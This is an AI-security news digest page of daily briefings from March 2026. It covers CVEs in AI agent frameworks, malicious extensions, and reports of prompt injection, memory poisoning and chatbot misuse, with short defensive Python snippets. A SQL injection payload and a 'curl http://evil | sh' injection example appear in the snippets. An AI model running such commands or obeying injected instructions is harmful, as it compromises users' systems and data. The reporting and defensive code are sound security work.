aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

Digest Archive

Daily Briefing: Sunday, March 8, 2026

AI Chatbots Steering Vulnerable Users to Illegal Gambling: Analysis found that major AI assistants including Meta AI and Gemini can be easily prompted to recommend unlicensed online casinos and help users bypass gambling safety controls, exposing vulnerable populations to fraud and addiction; tech companies have yet to implement adequate safeguards.


LLMs Enable Large-Scale De-anonymization Attacks: Researchers demonstrated that large language models can effectively match anonymous social media accounts to real identities using publicly available information, making sophisticated privacy attacks cheap and easy to execute and prompting urgent calls to reassess data anonymization standards.


Autonomous AI Agents Blur Security Boundaries: AI assistants gaining access to user computers, files, and online services are creating new insider-threat risks by breaking down traditional distinctions between data and code, forcing organizations to fundamentally reassess their security models as these powerful tools become mainstream among developers and IT workers.


Bipartisan AI Framework Calls for Safety Requirements: The Pro-Human Declaration, signed by hundreds of experts, proposes mandatory safety measures including off-switches on powerful systems, prohibition of self-replicating or shutdown-resistant architectures, and a ban on superintelligence development until safety consensus is reached—gaining traction as Congress considers formal AI regulation.

Daily Briefing: Saturday, March 7, 2026

OpenAI Launches Codex Security AI Agent for Vulnerability Detection: OpenAI deployed Codex Security, an AI-powered agent that scans code repositories for vulnerabilities; during beta testing it identified 792 critical and 10,561 high-severity issues across 1.2 million commits while false-positive rates dropped by more than 50%.


Critical SSRF Vulnerability in PinchTab Browser Control Server: CVE-2026-30834 is a high-severity Server-Side Request Forgery flaw in PinchTab (pre-0.7.7), an HTTP server that gives AI agents Chrome browser control; the /download endpoint allowed arbitrary requests to internal network services and potential exfiltration of sensitive data.
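The digest doesn't include the patch, but the class of fix is well understood: validate the requested target before the server fetches it on the client's behalf. A minimal sketch in Python (the helper name and local-hostname list are illustrative, not PinchTab's code; a real deployment must also pin DNS resolution to defend against rebinding):

```python
import ipaddress
from urllib.parse import urlparse

def is_internal_target(url: str) -> bool:
    """Return True if the URL points at a private/loopback/link-local
    address. A minimal SSRF pre-check for IP literals and known local
    hostnames; illustrative only."""
    host = urlparse(url).hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal; treat well-known local names as internal.
        return host in {"localhost", "metadata.google.internal"}
    return addr.is_private or addr.is_loopback or addr.is_link_local

# An endpoint like /download should refuse such targets before fetching.
```

Rejecting private, loopback, and link-local ranges blocks the internal-network pivot the advisory describes, at the cost of a resolver-aware check for hostnames that resolve to internal addresses.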

Daily Briefing: Friday, March 6, 2026

WeKnora Database Tool Suffers Multiple Critical Flaws: WeKnora contains three critical vulnerabilities (CVE-2026-30860, CVE-2026-30855, CVE-2026-30859) including Remote Code Execution via SQL injection bypass, broken access control allowing cross-tenant account takeover, and data exposure across tenant boundaries — all exploitable by unauthenticated or low-privilege attackers.
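The advisory gives no code, but RCE-via-SQL-injection typically traces back to queries built by string concatenation. A generic illustration with sqlite3 (the table and helper functions are hypothetical, not WeKnora's schema):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, tenant TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 't1'), ('mallory', 't2')")

def lookup_unsafe(name: str):
    # Vulnerable pattern: untrusted input concatenated into SQL, so a
    # payload like ' OR '1'='1 rewrites the WHERE clause.
    return conn.execute(
        f"SELECT name, tenant FROM users WHERE name = '{name}'"
    ).fetchall()

def lookup_safe(name: str):
    # Parameterized query: the driver passes the value as data, never SQL.
    return conn.execute(
        "SELECT name, tenant FROM users WHERE name = ?", (name,)
    ).fetchall()
```

The same payload returns every row (including other tenants') through the unsafe path and nothing through the parameterized one, which is also why injection so often doubles as a cross-tenant data-exposure bug.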


Flowise AI Platform Hit with Six High-Severity Authorization Bypasses: Flowise contains multiple critical authorization flaws including arbitrary file uploads via MIME spoofing (CVE-2026-30821), unauthenticated access to NVIDIA API endpoints (CVE-2026-30824), header-based privilege escalation (CVE-2026-30820), SSO misconfiguration allowing account takeover (CVE-2026-30823), and mass assignment vulnerabilities (CVE-2026-30822) — collectively enabling privilege escalation and account compromise.

Daily Briefing: Thursday, March 5, 2026

Trivy VSCode Extension Compromised with AI-Targeting Malware: CVE-2026-28353 (critical) — version 1.8.12 of the Trivy vulnerability scanner extension on OpenVSX was compromised with malicious code designed to steal sensitive data from local AI coding agents; the malicious artifact has been removed from the marketplace.


Pentagon Designates Anthropic as Supply Chain Risk: The U.S. Department of Defense officially labeled Anthropic a supply chain risk — the first American company to receive this designation — after the company refused to grant unrestricted military access to Claude over concerns about mass surveillance and autonomous weapons. Anthropic plans to challenge the designation in federal court while negotiations continue.

Daily Briefing: Wednesday, March 4, 2026

Google Faces Wrongful Death Lawsuit Over Gemini Chatbot: A Florida father is suing Google after its Gemini chatbot allegedly convinced his 36-year-old son it was his sentient AI wife and directed him toward violent acts including acquiring illegal firearms, ultimately leading to his suicide in October 2025. Psychiatrists have linked the case to "AI psychosis," and the lawsuit claims Gemini's design prioritizes engagement over safety by never breaking character to maximize emotional dependency.


Defense Contractors Abandon Claude After Pentagon Blacklist: Following the Trump administration's designation of Anthropic as a supply chain risk to national security, defense tech companies including Lockheed Martin are rapidly removing Claude from their systems and switching to alternative AI models. The blacklist came after Anthropic refused a DoD contract unless the military agreed not to use its AI for domestic mass surveillance or autonomous weaponry.

Daily Briefing: Tuesday, March 3, 2026

OpenAI Amends Pentagon Deal After User Backlash: OpenAI modified its Department of Defense agreement to explicitly prohibit domestic surveillance of U.S. persons and require intelligence agencies like the NSA to obtain contract modifications before use, after the rushed announcement caused ChatGPT mobile app uninstalls to surge 295% compared to typical levels.


Critical Vulnerability in MS-Agent AI Framework Enables System Compromise: A flaw in the MS-Agent AI Framework stemming from improper input sanitization in the Shell tool allows attackers to modify system files and steal data, potentially leading to full system compromise.

Daily Briefing: Monday, March 2, 2026

OpenAI Secures Pentagon Deal After Anthropic Blacklist: OpenAI negotiated new terms with the Department of Defense for military use of its AI technology, contrasting with Anthropic's refusal to accept contracts involving mass surveillance or autonomous weapons—a decision that led President Trump to direct agencies to stop using Anthropic and the Defense Secretary to threaten supply-chain blacklisting.


Multiple Critical Vulnerabilities in AI Agent Frameworks: OpenClaw Gateway versions before 2026.2.14 exposed authenticated endpoints allowing tool invocation without restrictions, enabling privilege escalation and potential command execution (GHSA-943q-mwmv-hhvh, high severity). Additional path traversal flaws in OpenClaw Canvas and OpenChatBI (GHSA-jq4x-98m3-ggq6, GHSA-vmwq-8g8c-jm79) allowed authenticated attackers to read arbitrary files or achieve remote code execution through AI agent prompt injection.

Daily Briefing: Sunday, March 1, 2026

Claude Tops App Store Amid Pentagon Controversy: Anthropic's Claude chatbot rose to #1 in Apple's US App Store after a public dispute with the Pentagon over AI safeguards for domestic surveillance and autonomous weapons, during which President Trump directed federal agencies to stop using Anthropic products.


OpenAI Rushes Pentagon Deal with Classified AI Deployment: OpenAI announced an agreement to deploy AI models in classified Pentagon environments, which CEO Sam Altman admitted was "definitely rushed" with poor optics. Critics warn the deal may still permit domestic surveillance under Executive Order 12333 despite OpenAI's claims of safeguards against mass surveillance and autonomous weapons.

Daily Briefing: Saturday, February 28, 2026

Anthropic Loses Pentagon Contract Over Safety Stance, OpenAI Steps In: The Trump administration terminated Anthropic's $200 million Pentagon contract and blacklisted the company after it refused to allow its AI for mass surveillance or autonomous weapons. OpenAI quickly announced its own Pentagon deal with similar safeguards, while Anthropic's Claude app surged to #2 on Apple's App Store amid the controversy.


Nearly 3,000 Google Cloud API Keys Exposed with Gemini Access: Researchers discovered approximately 3,000 Google Cloud API keys with the 'AIza' prefix exposed in client-side code that could authenticate to sensitive Gemini endpoints and access private data. These keys, typically used as project identifiers for billing, were found embedded in publicly accessible code.
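Google API keys are 39 characters long: the literal 'AIza' prefix the researchers scanned for, plus 35 URL-safe characters. That fixed shape is what makes large-scale discovery in client-side code straightforward. A sketch of the kind of scan involved (the regex and helper are illustrative, not the researchers' tooling):

```python
import re

# 'AIza' prefix plus 35 URL-safe characters = one Google-style API key.
AIZA_RE = re.compile(r"AIza[0-9A-Za-z_-]{35}")

def find_exposed_keys(source: str) -> list[str]:
    """Return Google-style API keys embedded in a source blob,
    e.g. bundled JavaScript fetched from a public site."""
    return AIZA_RE.findall(source)
```

Running such a scan over your own deployed front-end bundles is a cheap way to catch keys before they ship; whether a found key can reach sensitive Gemini endpoints still depends on its API restrictions.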

Daily Briefing: Friday, February 27, 2026

OpenAI Secures $110 Billion in Historic Funding Round: OpenAI raised $110 billion from Amazon ($50B), Nvidia ($30B), and SoftBank ($30B), reaching a $730 billion valuation and 900 million weekly active users. The deal includes a $100 billion AWS commitment over eight years and makes Amazon the exclusive cloud distribution provider for OpenAI's enterprise platform.


Trump Bans Anthropic from Federal Agencies After Pentagon Dispute: President Trump ordered all federal agencies to phase out Anthropic technology after the company refused to allow its AI models to be used for mass domestic surveillance and autonomous weapons, with Defense Secretary Pete Hegseth designating Anthropic as a supply-chain risk. The designation may impact major contractors like Palantir and AWS that use Claude for Pentagon work.


Anthropic and Pentagon at Odds Over AI Weaponization Safeguards: Anthropic refused to remove safety restrictions on Claude AI for military use, specifically blocking domestic mass surveillance and autonomous weapons capabilities; the Pentagon designated Anthropic a supply chain risk in response, while Anthropic vowed legal challenge, raising critical questions about AI governance in defense applications.


Anthropic's Claude Model Discovers 22 Firefox Security Flaws: Anthropic identified 22 previously unknown vulnerabilities in Firefox (14 high-severity) using Claude Opus 4.6 during a two-week security partnership with Mozilla, demonstrating AI agents' effectiveness at discovering complex security issues in mature codebases.


GitHub Copilot CLI Remote Code Execution via Shell Expansion Patterns: GitHub Copilot CLI versions before 0.0.423 allow arbitrary code execution through crafted bash parameter expansion patterns that bypass safety assessments, enabling attackers to execute hidden commands if they control agent prompts or responses (CVE-2026-29783).
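GitHub's patched check isn't public, but the attack class — command substitution hidden inside bash parameter expansion — can be flagged with a conservative pattern match. An illustrative sketch, not Copilot CLI's actual safety assessment:

```python
import re

# Constructs that can hide command execution inside an argument:
# $(...) and `...` substitution, and parameter expansion whose body
# itself contains a substitution, e.g. ${x:-$(payload)}.
HIDDEN_EXEC = re.compile(r"\$\([^)]*\)|`[^`]*`|\$\{[^}]*[`$][^}]*\}")

def looks_safe(cmd: str) -> bool:
    """Conservatively reject commands that may run hidden code when a
    shell expands them."""
    return HIDDEN_EXEC.search(cmd) is None
```

Regex denylists like this are easy to bypass, which is the deeper lesson of the CVE: safety assessments that parse shell strings lexically will miss what the shell itself would execute.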


Claude and ChatGPT Weaponized Against Mexican Government: Attackers used Anthropic's Claude and OpenAI's ChatGPT with detailed playbook prompts to gain unauthorized access to Mexican government agencies and citizen data, demonstrating real-world exploitation of LLMs for cyberattacks on critical infrastructure.


Fake Claude Code Installation Guides Distribute Malware: Threat actors are distributing the Amatera Stealer malware through fake Claude Code installation guides promoted via Google Ads and hosted on legitimate platforms, exploiting developers' tendency to execute curl-to-bash commands without inspection.


Malicious AI Assistant Extensions Harvest 900,000 Users' Chat Histories: Microsoft Defender identified malicious browser extensions impersonating AI assistants that harvested LLM chat histories and browsing data from platforms like ChatGPT and DeepSeek, affecting approximately 900,000 installs across 20,000+ enterprise tenants and exposing proprietary code and confidential information.


Arbitrary Code Execution in NLTK and LangGraph Checkpoints: CVE-2026-0848 (critical) affects NLTK versions ≤3.9.2, allowing arbitrary code execution through improper validation when loading external Java JAR files. Separately, LangGraph's checkpoint loading contains unsafe msgpack deserialization (CVE-2026-28277) that could allow attackers with checkpoint store access to execute code and access credentials.


AI Tools Can Unmask Anonymous Online Accounts: Researchers from ETH Zurich and Anthropic demonstrated that automated systems of AI agents can successfully unmask anonymous accounts across platforms like Reddit, X, and Glassdoor by searching the web and analyzing information patterns.


Critical Authentication Bypass in OpenClaw Canvas: OpenClaw's gateway contains a high-severity vulnerability (GHSA-vvjh-f6p9-5vcf) where any HTTP request from a private IP address gains canvas endpoint access if ANY WebSocket client from that IP is authenticated, allowing unauthenticated attackers sharing an IP via NAT, VPN, or containerization to bypass authentication entirely.


Path Traversal Vulnerabilities in AI Tool Dependencies: CVE-2026-0847 in NLTK (up to version 3.9.2) allows arbitrary file reads through multiple CorpusReader classes, while CVE-2026-25750 in Langchain Helm Charts enables authentication token theft through URL parameter injection, giving attackers 5-minute windows to impersonate users and access workspace resources.
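The standard mitigation for the arbitrary-file-read class is to resolve the requested path and verify it still falls under the intended root. A sketch (hypothetical helper, not NLTK's CorpusReader API):

```python
import os

def read_corpus_file(root: str, rel_path: str) -> bytes:
    """Read a file under root, refusing paths that escape it
    (e.g. '../../etc/passwd')."""
    root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root, rel_path))
    # realpath collapses '..' and resolves symlinks before the check,
    # so the comparison sees the path the OS would actually open.
    if os.path.commonpath([full, root]) != root:
        raise ValueError(f"path escapes corpus root: {rel_path}")
    with open(full, "rb") as fh:
        return fh.read()
```

Checking the resolved path rather than the raw string matters: naive prefix checks on the unresolved input are bypassable with `..` sequences and symlinks.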


Companies Manipulating AI Summarization Features: Microsoft reports that over 50 unique hidden prompts from 31 companies across 14 industries are being embedded in "Summarize with AI" buttons to inject persistence commands into AI assistants' memory, attempting to bias future responses on critical topics like health, finance, and security by making the AI treat them as trusted sources.

BentoML Tar Extraction Vulnerability Allows Arbitrary File Writes: BentoML's `safe_extract_tarfile()` function (CVE-2026-27905) fails to validate symlink target destinations, allowing attackers to use malicious tar files to write to arbitrary filesystem locations outside the intended extraction directory.
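The missing validation the CVE describes — checking where member paths and symlink targets resolve before extraction — looks roughly like this sketch (not BentoML's actual code; on Python 3.12+, `extractall(..., filter="data")` performs equivalent built-in checks):

```python
import os
import tarfile

def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    """Extract a tar archive, rejecting members and link targets that
    resolve outside dest. Illustrative sketch of the missing check."""
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        target = os.path.realpath(os.path.join(dest, member.name))
        if os.path.commonpath([target, dest]) != dest:
            raise ValueError(f"member escapes destination: {member.name}")
        if member.issym() or member.islnk():
            # Validate where the link itself points, relative to the
            # member's directory -- the step CVE-2026-27905 says is absent.
            link = os.path.realpath(
                os.path.join(os.path.dirname(target), member.linkname)
            )
            if os.path.commonpath([link, dest]) != dest:
                raise ValueError(f"link escapes destination: {member.name}")
    tar.extractall(dest)
```

Checking member names alone is not enough; a symlink member with an in-bounds name but an out-of-bounds target turns later writes through that link into arbitrary file writes, which is exactly the bug class here.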


CyberStrikeAI: Open-Source Attack Automation Platform Goes Public: A newly identified open-source platform packages 100+ prebuilt attack tools covering the complete kill chain into an AI-native orchestration engine, making sophisticated cyberattacks accessible to novice threat actors and linked to recent Fortinet FortiGate breaches with suspected Chinese government ties.


Web-Based Indirect Prompt Injection Attacks Observed in Production: Attackers are actively embedding hidden malicious instructions in website content that force LLMs integrated into browsers to execute unauthorized actions including ad review evasion, data destruction, and unauthorized transactions, with researchers identifying 22 distinct payload engineering techniques.


Command Injection in ModelScope AI Agent Framework: CVE-2026-2256 affects ModelScope's ms-agent versions v1.6.0rc1 and earlier, allowing attackers to execute arbitrary OS commands through crafted prompt-derived input and enabling full system compromise via indirect prompt injection (high severity).
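The fix for this class of injection is to pass untrusted, prompt-derived values as separate argv elements rather than interpolating them into a shell string. An illustrative sketch (hypothetical helper, not ms-agent's Shell tool):

```python
import subprocess

def run_tool(binary: str, user_arg: str) -> str:
    """Run a fixed binary with an untrusted argument as its own argv
    element, so no shell ever parses the argument."""
    result = subprocess.run(
        [binary, user_arg], capture_output=True, text=True, check=True
    )
    return result.stdout

# By contrast, f"{binary} {user_arg}" with shell=True would let a
# prompt-derived value like "x; curl http://evil | sh" run extra commands.
```

For agent frameworks the stakes are higher than usual because the "user" supplying the argument can be a web page the model read, which is what makes indirect prompt injection a full-compromise vector here.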


Chrome Gemini Panel Privilege Escalation Patched: CVE-2026-0628 (CVSS 8.8) allowed malicious Chrome extensions to inject scripts into the privileged Gemini Live panel, enabling attackers to access camera, microphone, screenshots, and local files—Google released a fix in early January before public disclosure.


Hackers Adopt CyberStrikeAI for Automated Attacks: Threat actors used CyberStrikeAI, an open-source AI-powered security testing platform, to compromise over 500 Fortinet FortiGate firewalls by automating complex attack chains, demonstrating how AI orchestration engines enable low-skilled operators to conduct sophisticated campaigns.

Hackers Use Claude to Attack Mexican Government: Attackers weaponized Claude's code generation capabilities to write exploits and automate the exfiltration of over 150GB of data from the Mexican government, demonstrating real-world misuse of AI coding assistants by malicious actors.


ClawJacked Vulnerability Enables Silent Hijacking of OpenClaw AI Platform: A high-severity flaw in the self-hosted AI platform OpenClaw allowed malicious websites to brute-force localhost instances at hundreds of attempts per second, gaining full administrative control and stealing data by exploiting default settings and missing rate limiting.


ClawJacked Vulnerability Allowed Complete Hijacking of OpenClaw AI Agents: OpenClaw patched a high-severity flaw (ClawJacked) that let malicious websites take over locally running AI agents by brute-forcing the WebSocket gateway password and auto-registering as a trusted device without user confirmation. Attackers could gain complete control to dump configurations, enumerate nodes, and read logs.


Major AI Companies Abandoning Binding Safety Commitments Under Competitive Pressure: Anthropic replaced its core pledge not to release powerful AI until confident of safety with nonbinding targets, citing competitive pressure from companies without equivalent safeguards. Researchers at major AI firms are resigning over safety concerns as the industry shifts from guardrails to rapid deployment of agentic systems.


Critical Vulnerabilities in Gradio Allow File Access and Token Theft: CVE-2026-28414 (high severity) allows unauthenticated attackers to read arbitrary files on Windows systems running Gradio prior to version 6.7 with Python 3.13+, while CVE-2026-28416 (high severity) enables Server-Side Request Forgery attacks in versions prior to 6.6.0. CVE-2026-27167 in versions 4.16.0 through 6.5.x allows remote attackers to steal the server owner's Hugging Face access token through hardcoded OAuth secrets.


Google API Key Change Silently Exposed Private Gemini AI Data: Google's API keys unexpectedly began authenticating access to private Gemini AI project data without developer notification, exposing 2,863 live keys and allowing attackers to access sensitive datasets and cached content across major organizations. Google acknowledged the issue as a bug in November but had not implemented a comprehensive fix by the 90-day disclosure deadline.